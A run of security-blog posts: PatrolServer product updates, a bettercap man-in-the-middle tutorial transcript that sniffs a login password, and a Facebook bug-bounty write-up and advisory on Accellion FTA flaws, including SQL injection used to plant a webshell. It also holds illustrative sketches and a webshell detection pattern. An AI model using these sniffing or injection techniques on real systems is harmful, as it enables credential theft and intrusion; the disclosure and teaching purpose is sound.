Today we’re releasing the Ignore functionality for your solution cards. That means you can take full control over what type of solutions you’d like to see. Just as importantly, you can now report false positives where needed.
Hide cards you no longer want to see
Imagine you would like to hide the WordPress update card like the one above. All it takes is a simple click on the Ignore button, and it will take you to a wizard-style menu where you can add constraints about ignoring that particular card.
It is possible to hide the card forever, or you can tell the filter to hide just that particular version (note, if a new version of the software gets released, the card will be visible again).
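To make the two options concrete, here is a minimal sketch of how such an ignore filter could behave. The `Card` and `IgnoreFilter` names and the version numbers are assumptions made up for illustration; this is not PatrolServer's actual implementation.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Card:
    software: str  # e.g. "WordPress"
    version: str   # the version this card refers to (hypothetical field)


@dataclass(frozen=True)
class IgnoreFilter:
    software: str
    version: Optional[str] = None  # None means "hide forever"

    def hides(self, card: Card) -> bool:
        if card.software != self.software:
            return False
        # A version-bound filter only hides the exact version it was created for.
        return self.version is None or self.version == card.version


def visible_cards(cards, filters):
    """Return the cards that no active filter hides."""
    return [c for c in cards if not any(f.hides(c) for f in filters)]


cards = [Card("WordPress", "4.5.2"), Card("WordPress", "4.5.3")]
only_this_version = IgnoreFilter("WordPress", version="4.5.2")
shown = visible_cards(cards, [only_this_version])
```

With the version-bound filter, the card for the newer release stays visible, while `IgnoreFilter("WordPress")` would hide both.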
View hidden cards
When you’ve hidden solution cards, they are not really gone. As the word describes, they are just hidden. When one or more cards are no longer visible, an option will be shown to view your hidden cards. They’re presented in the same format as regular ones.
If you no longer want a filter to be applied, take a look at the Filters view where you can remove your active filters.
I have been working on an online Burp Suite training for quite some time. It is finally ready.
It is based on the live Burp Suite workshop I have held at conferences and for local meetup groups. You will get to know every module of the free edition of Burp and you will be able to try everything yourself with the WebGoat vulnerable web application. The course covers everything from setting up the test environment to trying most of the functionality of Burp. It was also reviewed by PortSwigger, the company behind Burp, and they also mention it on their training site, so I guess they approve :). So check it out and don’t hesitate to give me feedback: http://hackademy.aetherlab.net
I recently discovered a fairly new man-in-the-middle tool called bettercap, which I will test in this video. I will explain the concept of ARP spoofing, install bettercap, and see how one can use it to sniff passwords on a network.
If you need it, here is the full transcript of the video:
Hello there. My name is Gergely Revay or Geri. Today I’m gonna talk about bettercap. This is a new tool I found recently and it got my attention because it’s a man in the middle tool. And we talk about man in the middle attacks all the time like in an assessment when we say it’s bad to send stuff unencrypted on the network because a man in the middle attacker can then sniff your network and find out your passwords or anything. When I found this tool, I thought this would be a good opportunity to play a little bit with man in the middle attacks. So what I’m gonna do today is introduce bettercap, talk a little bit about network sniffing and ARP poisoning for those people who don’t really know what that is and how it works, and then we’ll install and try bettercap, the basic features. We’ll sniff network a little bit to find some passwords and talk about what bettercap is capable of.
So let’s start with the installation. So you can see here already, I have the bettercap website on my screen. And basically the installation is not that difficult because you can just use Ruby GEM to install. Bettercap is actually a full Ruby application and you can extend it in Ruby. So it’s good for you if you know Ruby well. Now, the installation is also documented in the website so you can check it out and also do it yourself. So let’s go to a terminal. First, I’m gonna install the dependencies, which some of it is already installed in Kali but I’m not gonna check exactly and just go on with the installation. And then it’s build essential Ruby development packages and libpcap for manipulating traffic. Yeah. So now we have the dependencies. Then let’s get on with the installation of bettercap. And it’s gem install bettercap. It’s gonna take a little bit so just be patient. Okay, the installation is ready so let’s see if we can execute it. Yes. So that’s how it works. That’s a good start.
Now, before I start getting into bettercap, I will just explain quickly how this network sniffing works, how ARP poisoning works, etc. For that, let me draw for you. So what happens here, I’m gonna use two computers, the Kali that you’ve seen and a Windows 8 machine. These are both virtual machines and they’re both on the same network. So what it essentially means is that we have Internet there. And then I have a router here. I have here my Kali and I have here my victim. So normally the victim communicates with the router directly and then that goes to the Internet. The goal that we want to reach is that this communication goes to Kali and then to the router. Now, bettercap offers different methods to do this. What we are gonna use is ARP poisoning, which means that Kali has a MAC address here. It’s called MAC K, let’s call it this way. He has a MAC V, and this has a MAC R. So these are normal MAC addresses that you already know. When the victim wants to go to the Internet, he has to first send the packets to the router. So what he will ask, he will know the IP address of the router, but he wants to find out what the MAC address for that IP address is so that he can send the packet. He will ask the network what is the MAC address for that particular IP address.
Now, what bettercap does is whenever such a request happens, then he will always respond hopefully as the first responder. He always say that my MAC address is for that IP. So whenever the victim or the router or anybody else on this network asks for IP address or asks for the MAC address of an IP address, our attacker with bettercap will always say that my MAC address is related to this IP address. That way, basically, the victim is gonna think that on the network he has to send his packet first here because he will think that this is the router and then bettercap will relay this packet to the router but also when a packet comes back, the router will also think — because he will also request a MAC address – he will also think that Kali or bettercap is the victim. And then Kali will just relay again the packet to the victim. So we basically reached our goal here. Because of this ARP spoofing or ARP poisoning, all packets will cross our Kali machine through bettercap and then from this point on, basically bettercap is able to do whatever he wants with those packets. Bettercap also offers different tools to do different things with the traffic, but what we’re gonna try is just to look at the traffic find valuable information like passwords. So I hope that’s clear now, and I will just move on to working with bettercap and see how we can actually do a man in the middle attack.
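For readers who prefer code to drawings, the idea can be modelled without touching a real network. The sketch below is a toy simulation only: the `Host` class, the IP addresses and the `MAC_K`/`MAC_V`/`MAC_R` labels are assumptions for illustration, and it is not how bettercap itself is implemented.

```python
class Host:
    """A toy network host with an ARP cache (IP address -> MAC address)."""

    def __init__(self, name, ip, mac):
        self.name, self.ip, self.mac = name, ip, mac
        self.arp_cache = {}

    def receive_arp_reply(self, ip, mac):
        # The reply is accepted without verifying who sent it,
        # which is the weakness ARP poisoning relies on.
        self.arp_cache[ip] = mac

    def next_hop_mac(self, ip):
        return self.arp_cache[ip]


router = Host("router", "192.168.1.1", "MAC_R")
victim = Host("victim", "192.168.1.20", "MAC_V")
kali = Host("kali", "192.168.1.10", "MAC_K")

# Normal state: victim and router learn each other's real MAC addresses.
victim.receive_arp_reply(router.ip, router.mac)
router.receive_arp_reply(victim.ip, victim.mac)

# Poisoning: Kali claims both IP addresses for its own MAC address.
victim.receive_arp_reply(router.ip, kali.mac)
router.receive_arp_reply(victim.ip, kali.mac)
```

After the two forged replies, both `victim.next_hop_mac(router.ip)` and `router.next_hop_mac(victim.ip)` point at Kali, so traffic in both directions crosses the attacker's machine.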
So let’s look at our target first or our victim. So what I’m gonna try to do is to try to intercept the traffic of this victim. We are gonna try to intercept the HTTP traffic to a particular website, which is cheezburger.com. I chose this website mostly because I don’t use this application. So we can login here. I will just do it first as a normal user, and then we will try to intercept that again with bettercap. So the user is [email protected]. This is my old website. Okay, you see I successfully logged in. Now we’re gonna try to intercept the same thing with bettercap. So I’ll log out, even close my browser.
So now what we have to do is to come back to Kali and start bettercap with the proper configuration to do the spoofing for us. So first we need bettercap. And then we want to sniff the network so we use the sniffer. And then as I said, you can use different techniques for spoofing. The default is the ARP spoofing, but I will specify it here anyway so you just have it on the command line. And since we are gonna work with HTTP and HTTPS traffic probably, I will use the HTTP and HTTPS proxies offered by bettercap. And for that, you say proxy http and minus minus proxy https. And there are different parsers in bettercap. What I’m gonna use now is the custom parser. And I will look for something like “password” in the traffic. And then we hope that the password for Cheezburger.com is gonna be caught by bettercap.
So let’s start the sniffing. What you see here is that bettercap started. First it tries to figure out the targets on the network, so which one is the gateway, which ones are the other machines on the network, so that he can spoof these machines on the network. Because we chose the HTTPS proxy, it will also generate a certificate for itself to try to avoid recognition. Of course, this is not a real valid Google.com certificate. It’s a fake, but it could be useful. So let’s go back to the victim’s machine. Let’s load Cheezburger. Now you see there are already lots of things happening here. You see all this content because that’s HTTP and that’s what we are looking for. You can also see that it’s from many different places. The thing is that the website is just full of different content from different websites so that’s why the requests go to basically everywhere all around the Internet and not only to Cheezburger.com.
Let’s try to login. So the user is [email protected]. Okay, and I will just quickly change back to Kali. Again, lots of things happened. Let’s just try to find our password. This looks interesting. This is a GET request to the LoginOrRegister service. And if you look through for the password, whatever, whatever, oh, here is, this is the e-mail address. So this is username. And oh, what we can see here is the password, and this is actually the password I used. So it worked out. Of course, you know, you have to really look at the traffic. Scroll here, scroll there, but it worked.
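Scrolling through the output by hand works, but the same search can be automated. The following is a rough sketch of pulling credential-like parameters out of a captured request line. The request path, the parameter names and the sample values are assumptions for illustration; the real request in the video may look different.

```python
from urllib.parse import urlsplit, parse_qs


def find_credentials(request_line, keywords=("password", "passwd", "email", "user")):
    """Return the query parameters whose name contains one of the keywords."""
    _method, target, _version = request_line.split(" ", 2)
    params = parse_qs(urlsplit(target).query)
    return {
        name: values
        for name, values in params.items()
        if any(keyword in name.lower() for keyword in keywords)
    }


# Hypothetical captured request line, not the one from the video.
captured = "GET /LoginOrRegister?email=alice%40example.com&password=s3cret&x=1 HTTP/1.1"
hits = find_credentials(captured)
```

Because the credentials travel in a plain HTTP query string, anyone who sees the request line can read them after URL-decoding.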
Another thing that I would like to mention is that originally I actually wanted to spoof HTTPS traffic, and I started to play with Cheezburger. And it turned out that it uses just HTTP so this password is not even encrypted on the network which is generally bad. But yeah, it’s Cheezburger.com so I didn’t have really high expectations. But the point is that our network spoofing was successful. We were able to attract all traffic between the router and the victim computer to Kali, to bettercap. We were able to actually sniff the password of the user during the login. So that’s very good. That was our goal.
One really important thing is that when you close bettercap, you need to gracefully exit which is implemented when you do Ctrl+C because the thing is that ARP poisoning is actually poisoning the ARP cache of the other computers so before you exit, you have to change back the MAC addresses of their caches to the original one. Otherwise, the network will just die for some time until they figure out that the MAC address in the cache is wrong and then request for new MAC addresses. So it’s always important if you do ARP poisoning that you gracefully exit from the tool.
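The "restore on exit" idea can be sketched with a context manager that always puts the original cache entry back, even when the run is interrupted. This is a toy model over a plain dictionary with made-up addresses, an assumption for illustration rather than bettercap's actual shutdown code.

```python
from contextlib import contextmanager


@contextmanager
def poisoned(cache, ip, fake_mac):
    """Temporarily replace the cached MAC for `ip`, restoring it on exit."""
    original = cache.get(ip)
    cache[ip] = fake_mac
    try:
        yield cache
    finally:
        # Runs on a normal exit and on KeyboardInterrupt (Ctrl+C) alike.
        if original is None:
            cache.pop(ip, None)
        else:
            cache[ip] = original


victim_cache = {"192.168.1.1": "MAC_R"}
try:
    with poisoned(victim_cache, "192.168.1.1", "MAC_K"):
        during = victim_cache["192.168.1.1"]
        raise KeyboardInterrupt  # simulate pressing Ctrl+C
except KeyboardInterrupt:
    pass
```

Without the `finally` block the stale entry would stay in the cache, which corresponds to the network "dying" until the hosts ask for the MAC address again.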
Another thing that I would like to mention is that bettercap is trying to be extensible. So if you come here to the library and you look around a little bit, then you will see everything that you could use is here and you can start implementing your own things. You can start to implement your own proxy to do like portable things with the request like change the content of the request or change the content of the response automatically so then you don’t have to like look in the logs to find the password. You can just dump the password for yourself automatically or you can manipulate every response so that the user sees something else. So there are lots of possibilities here. And I think @evilsocket, the guy who writes bettercap, he did a really good job here. So if you find this interesting, you can start playing with bettercap as well. If you do something cool like write your own proxy tool or any kind of extension, then let me know or comment here so that everybody knows that there’s something new here. Or if you discover something interesting, also just comment on this post. That’s it. I was Geri Revay from Aether Security Labs and take care. Keep hacking. Ciao.
As a pentester, I love server-side vulnerabilities more than client-side ones. Why? Because it’s way cooler to take over the server directly and gain system SHELL privileges. <( ̄︶ ̄)>
Of course, both server-side and client-side vulnerabilities are indispensable in a perfect penetration test. Sometimes, in order to take over the server more elegantly, it also takes some client-side vulnerabilities to do the trick. But when it comes to finding vulnerabilities, I prefer to look for server-side ones first.
With the growing popularity of Facebook around the world, I’ve always been interested in testing the security of Facebook. Luckily, in 2012, Facebook launched the Bug Bounty Program, which motivated me even more to give it a shot.
From a pentester’s view, I tend to start from recon and do some research. First, I’ll determine how large the “territory” of the company on the internet is, then…try to find a nice entrance to get in, for example:
What can I find by Google Hacking?
How many B Class IP addresses are used? How many C Class IPs?
Whois? Reverse Whois?
What domain names are used? What are their internal domain names? Then proceed with enumerating sub-domains
What are their preferred techniques and equipment vendors?
Any data breach on Github or Pastebin?
…etc
Of course, Bug Bounty is not about firing random attacks without restrictions. Compare your findings with the actions permitted by the Bug Bounty program; the overlapping part is the part worth trying.
Here I’d like to explain some common security problems found in large corporations during pentesting by giving an example.
For most enterprises, the “Network Boundary” is a rather difficult part to take care of. When a company has grown large, with tens of thousands of routers, servers and computers for the MIS to handle, it’s impossible to build a perfect protection mechanism. Attacks can only be defended against with general rules, but a successful attack only needs one tiny weak spot. That’s why luck is often on the attacker’s side: a vulnerable server on the “border” is enough to grant a ticket to the internal network!
Lack of awareness in “Networking Equipment” protection. Most networking equipment doesn’t offer delicate SHELL controls and can only be configured on the user interface. Oftentimes the protection of these devices is built on the Network Layer. However, users might not even notice if these devices were compromised by 0-Day or 1-Day attacks.
Security of people: we have now witnessed the emergence of the “Breached Database” (aka “Social Engineering Database” in China), and this leaked data sometimes makes penetration incredibly easy. Just connect to the breached database, find a user credential with VPN access…then voilà! You can proceed with penetrating the internal network. This is especially true when the scope of the data breach is so huge that the Key Man’s password can be found in the breached data. If this happens, the security of the victim company amounts to nothing. :P
For sure, when looking for the vulnerabilities on Facebook, I followed the thinking of the penetration tests which I was used to. When I was doing some recon and research, not only did I look up the domain names of Facebook itself, but also tried Reverse Whois. And to my surprise, I found an INTERESTING domain name:
tfbnw.net
TFBNW seemed to stand for “TheFacebook Network”
Then I found the server below through public data:
vpn.tfbnw.net
WOW. When I accessed vpn.tfbnw.net, there was the Juniper SSL VPN login interface. But its version seemed to be quite new and there was no vulnerability that could be directly exploited…nevertheless, it marked the beginning of the following story.
It looked like TFBNW was an internal domain name for Facebook. I tried enumerating the C Class IPs of vpn.tfbnw.net and found some interesting servers, for example:
Mail Server Outlook Web App
F5 BIGIP SSL VPN
CISCO ASA SSL VPN
Oracle E-Business
MobileIron MDM
From the info of these servers, I thought that these C Class IPs were relatively important for Facebook. Now, the whole story officially starts here.
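Enumerating the “C Class” of an address simply means listing every host in the surrounding /24 network. A minimal sketch with Python’s standard library is shown below; the address is a placeholder from the documentation range, not one of Facebook’s, and the helper name is made up for illustration.

```python
import ipaddress


def class_c_neighbours(ip):
    """Return all host addresses in the /24 network that contains `ip`."""
    network = ipaddress.ip_network(f"{ip}/24", strict=False)
    return [str(host) for host in network.hosts()]


# 192.0.2.0/24 is reserved for documentation, so it is safe as an example.
candidates = class_c_neighbours("192.0.2.77")
```

Each candidate could then be checked with whatever probing the bug bounty rules permit, for example looking at the certificate or landing page it serves.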
Vulnerability Discovery
I found a special server among these C Class IPs.
files.fb.com
↑ Login Interface of files.fb.com
Judging from the LOGO and Footer, this seems to be Accellion’s Secure File Transfer (hereafter known as FTA)
FTA is a product which enables secure file transfer, online file sharing and syncing, as well as integration with Single Sign-on mechanisms including AD, LDAP and Kerberos. The Enterprise version even supports SSL VPN service.
Upon seeing this, the first thing I did was search for publicized exploits on the internet. The latest one was found by HD Moore and made public in this Rapid7 Advisory.
Whether this vulnerability is exploitable can be determined from the version information leaked by “/tws/getStatus”. At the time I discovered files.fb.com, the defective v0.18 had already been updated to v0.20. But from the fragments of source code mentioned in the Advisory, I felt that with such a coding style there should still be security issues remaining in FTA if I kept looking. Therefore, I began to look for 0-Day vulnerabilities in FTA products!
Actually, black-box testing didn’t turn up any possible vulnerabilities, so I had to try white-box testing. After gathering the source code of previous FTA versions from several sources, I could finally proceed with my research!
The FTA Product
Web-based user interfaces were mainly composed of Perl & PHP
The PHP source codes were encrypted by IonCube
Lots of Perl Daemons in the background
First I tried to decrypt IonCube encryption. In order to avoid being reviewed by the hackers, a lot of network equipment vendors will encrypt their product source codes. Fortunately, the IonCube version used by FTA was not up to date and could be decrypted with ready-made tools. But I still had to fix some details, or it’s gonna be messy…
After a simple review, I thought Rapid7 should have already got the easier vulnerabilities. T^T
And the vulnerabilities which needed to be triggered were not easy to exploit. Therefore I needed to look deeper!
Finally, I found 7 vulnerabilities, including
Cross-Site Scripting x 3
Pre-Auth SQL Injection leads to Remote Code Execution
Known-Secret-Key leads to Remote Code Execution
Local Privilege Escalation x 2
Apart from what was reported to the Facebook Security Team, the other vulnerabilities were submitted to the Accellion Support Team in an Advisory for their reference. After the vendor patched them, I also sent them to CERT/CC, and they assigned 4 CVEs for these vulnerabilities.
CVE-2016-2350
CVE-2016-2351
CVE-2016-2352
CVE-2016-2353
More details will be published in accordance with the full disclosure policy!
↑ Using Pre-Auth SQL Injection to Write Webshell
After taking control of the server successfully, the first thing is to check whether the server environment is friendly to you. To stay on the server longer, you have to be familiar with the environments, restrictions, logs, etc and try hard not to be detected. :P
There are some restrictions on the server:
Outbound connections blocked by the firewall, including TCP and UDP on ports 53, 80 and 443
Remote Syslog server
Auditd logs enabled
Although outbound connections were not available, it looked like an ICMP Tunnel was working. Nevertheless, this was only a Bug Bounty Program, so we could simply control the server with a webshell.
Was There Something Strange?
While collecting vulnerability details and evidence for reporting to Facebook, I found some strange things in the web log.
First of all I found some strange PHP error messages in “/var/opt/apache/php_error_log”
These error messages seemed to be caused by modifying codes online?
↑ PHP error log
I followed the PHP paths in the error messages and ended up discovering suspicious WEBSHELL files left by previous “visitors”.
The first few were typical PHP one-line backdoors, with one exception: “sclient_user_class_standard.inc”
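For defenders, “typical one-line backdoors” are usually easy to spot because they pass request data straight into a code- or command-execution function. Here is a rough detection sketch; the function list and the sample strings are assumptions for illustration, and real webshells are often obfuscated well beyond what such a pattern catches.

```python
import re

# Execution functions fed directly from request superglobals.
ONE_LINER = re.compile(
    r"\b(?:eval|assert|system|passthru|shell_exec)\s*\(\s*"
    r"\$_(?:GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)


def looks_like_one_line_backdoor(php_source):
    """Return True if the PHP source matches the simple backdoor pattern."""
    return bool(ONE_LINER.search(php_source))


suspicious = "<?php @eval($_POST['x']); ?>"
harmless = "<?php echo htmlspecialchars($_GET['q']); ?>"
```

A file like the logging proxy described next would not match this pattern, which is why it stood out as the exception.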
The file pulled in via include_once, “sclient_user_class_standard.inc.orig”, was the original PHP app for password verification, and the hacker created a proxy in between to log GET, POST and COOKIE values while some important operations were under way.
In brief, the hacker created a proxy on the credential page to log the credentials of Facebook employees. The logged passwords were stored under the web directory so that the hacker could fetch them with WGET every once in a while.
From this info we can see that apart from the logged credentials there were also contents of letters requesting files from FTA, and these logged credentials were rotated regularly (this will be mentioned later, that’s kinda cheap…XD)
And at the time I discovered these, there were around 300 logged credentials dated between February 1st and 7th, mostly “@fb.com” and “@facebook.com”. Upon seeing this, I thought it was a pretty serious security incident. In FTA, there were mainly two modes for user login:
Regular users sign up: their password hashes were stored in the database, hashed with SHA256+SALT
All Facebook employees (@fb.com) used LDAP and were authenticated by the AD Server
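To show what “SHA256+SALT” storage generally means, here is a small sketch. How FTA actually combines the salt and the password is not stated in this post, so the concatenation order, the salt length and the function names below are assumptions.

```python
import hashlib
import hmac
import os


def hash_password(password, salt=None):
    """Return (salt, hex digest) for a salted SHA-256 password hash."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.sha256(salt + password.encode("utf-8")).hexdigest()
    return salt, digest


def verify_password(password, salt, expected_digest):
    """Re-hash the candidate password and compare in constant time."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected_digest)


salt, stored = hash_password("hunter2")
```

A stored hash like this does not reveal the password directly, whereas a proxy sitting in front of the login code sees the password before any hashing or LDAP check takes place.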
I believe these logged credentials were real passwords and I GUESS they could be used to access services such as Mail OWA and VPN for further penetration…
In addition, this hacker might be careless:P
The backdoor parameters were passed through the GET method, so his footprints could be identified easily in the web log
When the hacker was sending out commands, he didn’t take care of STDERR and left a lot of command error messages in the web log, from which his operations could be seen
From access.log, every few days the hacker would clear all the credentials he had logged
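Because the backdoor took its parameters via GET, they end up in the access log and can be pulled out mechanically. The sketch below assumes a common Apache-style log line and a made-up backdoor path; neither is taken from the actual server.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Matches the quoted request and status code of an Apache-style log line.
LOG_LINE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def suspicious_requests(lines, suspect_paths):
    """Yield (path, params) for GET requests to suspect paths with a query."""
    for line in lines:
        match = LOG_LINE.search(line)
        if not match or match.group("method") != "GET":
            continue
        url = urlsplit(match.group("target"))
        if url.path in suspect_paths and url.query:
            yield url.path, dict(parse_qsl(url.query))


# Hypothetical log lines for illustration only.
sample = [
    '198.51.100.7 - - [01/Feb/2016:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Feb/2016:10:00:05 +0000] "GET /x/backdoor.php?cmd=ls+-la HTTP/1.1" 200 87',
    '198.51.100.7 - - [01/Feb/2016:10:00:09 +0000] "POST /x/backdoor.php HTTP/1.1" 200 12',
]
found = list(suspicious_requests(sample, {"/x/backdoor.php"}))
```

Parameters sent via POST would not show up this way, which is part of why passing them via GET was careless.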
Packing files
Enumerating internal network architecture
Use ShellScript to scan internal network but forgot to redirect STDERR XD
Attempt to connect internal LDAP server
Attempt to access internal server
(Looked like Mail OWA could be accessed directly…)
Attempt to steal SSL Private Key
After checking the browser, the SSL certificate of files.fb.com was *.fb.com …
Epilogue
After adequate proof had been collected, it was immediately reported to the Facebook Security Team. Besides the vulnerability details, the accompanying logs, screenshots and timelines were also submitted xD
Also, from the log on the server, there were two periods in which the system was obviously operated by the hacker, one in the beginning of July and one in mid-September. The July one seemed to be a server “dorking” and the September one seemed more vicious. Other than server “dorking”, keyloggers were also implemented. As for the identities of these two hackers, were they the same person? Your guess is as good as mine. :P
The July incident happened to take place right before the announcement of the CVE-2015-2857 exploit. Whether it was an intrusion via a 1-day exploit or an unknown 0-day remains an open question.
Here’s the end of the story, and, generally speaking, it was a rather interesting experience xD
This event inspired me to write some articles about penetration :P
Last but not least, I would like to thank Bug Bounty and the tolerant Facebook Security Team for letting me fully write down this incident : )
Timeline
2016/02/05 20:05 Provide vulnerability details to Facebook Security Team
2016/02/05 20:08 Receive automatic response
2016/02/06 05:21 Submit vulnerability Advisory to Accellion Support Team
2016/02/06 07:42 Receive response from Thomas that inspection is in progress
2016/02/13 07:43 Receive response from Reginaldo about receiving a Bug Bounty award of $10000 USD
2016/02/13 Ask whether there is anything I should pay special attention to in the blog post
2016/02/13 Ask whether this vulnerability is classified as RCE or SQL Injection
2016/02/18 Receive response from Reginaldo that there is a forensics investigation, asking whether I would be able to hold my blog post until this process is complete
2016/02/24 Receive response from Hai that the bounty will be included in the March payment cycle
2016/04/20 Receive response from Reginaldo that the forensics investigation is done
What better way to start the summer than with a brand new release of PatrolServer? We’re very proud to announce that version 1.1.0 is now available to all of you.
No matter how you use PatrolServer, whether it’s the API, or our dashboard and scanner, you’re going to love this new version. We integrated the most requested features, polished both the front and back-end and made the entire experience a whole lot faster. We put a strong focus on developers over the past months, so keep on reading for more exciting news. You’ll love this as much as we do, for sure!
Filtering
Technically speaking, filtering cards is not a new feature; it has been enabled for most accounts for the past few months. Today, the feature is officially out of beta. We’ve been tweaking the ability to filter cards under the hood, and restoring cards is now possible by clicking the “restore” button. Below is a small demonstration of how you can filter out unwanted cards.
Verification with Bash Scanner
In the previous version, verifying your server was only possible by us sending an email to the administrator account of the domain or by uploading an HTML file to your server. We decided to put Bash Scanner a little more in the spotlight (seriously, you’ll get the most out of the features when installing Bash Scanner), thus the new default verification method is now the scanner.
If you prefer alternative methods such as uploading the HTML file or using email, they are still there under the “Alternate methods” tab.
Reminders
Server reminders have been the most requested feature of the past few months. Basically, at each chosen interval (either weekly or monthly), we’ll send you a reminder of all the issues on your servers by email. The new “Mail settings” page gives you more control over which emails you’ll get and which ones you’d like to exclude.
Analytics
You can now see detailed analytics data for your scanned servers. It might take some time until PatrolServer has gathered enough information, but analytics gives you a view of the status of your servers over time.
We also have graphs available to display the number of exploits and vulnerabilities over time, but we leave those up to you to discover. If you’d like to visit the brand new analytics page, click on your server name at the top left and select “Graphs”; it’s right under the filter view.
Looking at our own internal analytics has been a lot of fun, and we hope you like them as much as we do!
For Developers
Brand new API documentation
PatrolServer is a service for developers to keep track of outdated software on their servers. We run a daily scan on your servers to make sure you run updated software. We would like to make it easy for you developers to integrate with our services and deliver across many platforms. Our powerful APIs are here to provide you with a smooth integration into your own project. Our developer tools allow you to access your own data within the PatrolServer architecture. Our ultimate goal is to cover virtually all facets of PatrolServer, for you to integrate whenever you want.
Developers can now enjoy the brand new API documentation pages. They are much more structured and provide examples for all interactions with the PatrolServer API.
The PHP SDK provides a stable interface to implement PatrolServer functionality in your own applications. The SDK makes integration child’s play. Take a look at the example below to see how easy it is to react when your server has finished scanning. You can do all kinds of interactions afterwards.
// Use the Singleton or create a separate PatrolSdk\Patrol object
use PatrolSdk\Singleton as Patrol;

Patrol::setApiKey('194786f61ea856b6468c0c41fa0d4bdb');
Patrol::setApiSecret('DC360a34e730ae96d74f545a286bfb01468cd01bb191eed49d9e421c2e56f958');

Patrol::webhook('scan_finished', function ($event) {
    $server_id = $event['server_id'];

    if ($server_id) {
        // Get the Server object from the server_id
        $server = Patrol::server($server_id);

        // Get the installed software
        $software = $server->allSoftware();
    }
});
Take a look at the PatrolServer PHP SDK on GitHub. We’ve also written a Laravel Facade with various other features, such as automatically updating composer modules the moment they become outdated.
Under the hood
We detect a whole lot more software than ever before, thus we had to tweak performance in order to provide the same smooth experience as before. The team and I have rewritten card generation from scratch, with better performance in mind. We now rely extensively on caching mechanisms, as well as pre-generating data when users are the least active on our platform (e.g., at midnight, we perform more resource-heavy tasks than during the day).
On average, resource-heavy actions are at least 60% faster than before.
Nowadays, we support a vast majority of the most popular npm modules. We’ve added 80.000 more npm modules to the scanner and we’re counting. The PatrolServer scanner is able to find over 160.000 different installed software (+ modules, packages, …) on your server.
Feel free to give our new changes a try, and as always, thank you for using PatrolServer!
Changelog:
Send me mails about my server status (setting)
Send me mails about PatrolServer news (setting)
Remind me about my server statuses (setting)
Quick link from account settings to API settings
Remove account (setting)
Webhooks event log viewer
Bash Scanner is first verification option
Support phpMyAdmin
Support Joomla!
npm now has +30.000 modules
Support Magento
Card creation from scan results is rewritten from scratch
Accellion File Transfer Appliance (FTA) is a secure file transfer service which enables users to share and sync files online with AES 128/256 encryption. The Enterprise version further incorporates SSL VPN services with integration of Single Sign-on mechanisms like AD, LDAP and Kerberos.
Vulnerability Details
In this research, the following vulnerabilities were discovered on the FTA version FTA_9_12_0 (13-Oct-2015 Release)
Cross-Site Scripting x 3
Pre-Auth SQL Injection leads to Remote Code Execution
Known-Secret-Key leads to Remote Code Execution
Local Privilege Escalation x 2
The above-mentioned vulnerabilities allow unauthenticated attackers to remotely attack FTA servers and gain the highest privileges. Once attackers fully control a server, they are able to retrieve the encrypted files, user data, etc.
After reporting to CERT/CC, these vulnerabilities were assigned 4 CVEs (CVE-2016-2350, CVE-2016-2351, CVE-2016-2352, CVE-2016-2353).
Areas Affected
According to a public data reconnaissance, there are currently 1,217 FTA servers online around the world, most of which are located in the US, followed by Canada, Australia, UK, and Singapore.
Judging from the domain names and SSL certificates of these servers, FTA is widely used by governmental bodies, educational institutions and enterprises, including several well-known brands.
Pre-Auth SQL Injection leads to RCE (CVE-2016-2351)
During code review, a pre-authentication SQL Injection vulnerability was found in FTA. This vulnerability grants malicious users access to sensitive data and personal information on the server through SQL Injection, and allows them to achieve remote code execution (RCE) by further exploiting privilege-escalation vulnerabilities.
The key to this problem lies in the client_properties( ... ) function called by security_key2.api!
/home/seos/courier/security_key2.api
Among these parameters, $g_app_id, $g_username, $client_id and $password are controllable by the attackers. And although the function _decrypt( ... ) handles the passwords, it is not involved in triggering the vulnerability.
One thing to pay special attention to is that the value of $g_app_id will be treated as a global variable which represents the current Application ID in use, and will be applied in opendb( ) accordingly. The code in opendb( ) includes the following lines:
In mysql_select_db, the name of the database to be opened is controllable by the user. If a wrong value is given, the program will be interrupted. Therefore, $g_app_id must be forged correctly.
The following lines are the most important function client_properties( $client_id ).
The parameters passed onto the function client_properties( ... ) will be assembled into SQL statements. Among all the functions joining the assembling, construct_where_clause( ... ) is the most crucial one.
In the function construct_where_clause( ... ), every parameter is protected by the string mysql_real_escape_string except for $client_id. Judging from the coding style of the source code, it might be a result of oversight. Therefore, SQL Injection can be triggered by sending out corresponding parameters according to the program flow.
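The effect of one unescaped parameter in a WHERE-clause builder can be sketched in Python. This is only an illustration of the bug class, not the FTA code: sqlite3 stands in for MySQL, escape() is a simplified stand-in for mysql_real_escape_string, and the table, column and function names are hypothetical.

```python
import sqlite3


def escape(value):
    # Simplified stand-in for mysql_real_escape_string (assumption):
    # only doubles single quotes, which is enough for this demo.
    return value.replace("'", "''")


def build_where_unsafe(username, client_id):
    # username is escaped, client_id is not: the kind of oversight
    # described above for construct_where_clause( ... ).
    return "username = '%s' AND client_id = '%s'" % (escape(username), client_id)


def lookup_unsafe(conn, username, client_id):
    sql = "SELECT username FROM clients WHERE " + build_where_unsafe(username, client_id)
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username, client_id):
    # Bound parameters keep user input out of the SQL text entirely.
    sql = "SELECT username FROM clients WHERE username = ? AND client_id = ?"
    return conn.execute(sql, (username, client_id)).fetchall()


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE clients (username TEXT, client_id TEXT)")
conn.executemany("INSERT INTO clients VALUES (?, ?)", [("alice", "c1"), ("bob", "c2")])

payload = "x' OR '1'='1"
unsafe_rows = lookup_unsafe(conn, "alice", payload)  # condition is always true
safe_rows = lookup_safe(conn, "alice", payload)      # payload is treated as data
```

With the unescaped parameter the query returns every row, while the parameterized version returns none, since no client_id equals the literal payload string.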
In addition, the FTA database user has root privileges with the FILE_PRIV option enabled. By using INTO OUTFILE to write their own PHP code into a writable directory, an attacker can execute code remotely!
PoC
The created PHP file will be located at
http://<fta>/courier/themes/templates/.cc.php
Known-Secret-Key leads to Remote Code Execution
